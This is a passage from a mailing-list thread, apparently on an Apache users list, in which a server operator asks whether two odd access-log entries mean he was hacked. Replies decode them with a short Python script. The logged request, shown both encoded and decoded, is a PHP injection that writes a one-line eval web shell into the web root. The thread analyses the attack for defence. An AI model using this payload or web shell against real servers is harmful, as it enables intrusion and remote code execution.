If you have python installed...The following python script shows some simple commands for decoding (for future reference).
test =""" /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90"""
import urllib.parse
print(urllib.parse.unquote(test))
import base64
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))
********************************************************
It yields...
python unquote.py
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME
>
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
'|<-';
> HTTP/1.1" 200 90 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME > NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
> HTTP/1.1" 200 90 b'<?php eval($_POST[1]);?>' ********************************************************I also have a program that attempts to get an email address to notify in the event of abuse. It yields the following.
python getAbuseEmail.py 91.200.12.33 ['noc@xxxxxxxxxxxx'] though it is unlikely you'll get a response ;-) On 2/6/2017 8:36 AM, Jack Swan wrote:
I didn't decode it all. I'll leave the rest up to you, but the %characters are hexadecimal characters. Look up hex charset.
So the first line translates to (I may have missed a char or two...)
GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
----- Original Message -----
From: bernd.lentes@xxxxxxxxxxxxxxxxxxxxx
To: users@xxxxxxxxxxxxxxxx
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: am i hacked ?
Hi,
just in the moment i found two very weird entries in may access_log:
91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
What upsets me is that these two requests have statuscode 200, which mean it was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? Does anyone understand what happened here ? It's apache 2.2.3 64bit.
Thanks for any hint.
Bernd
--------------------------------------------------------------------- To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
|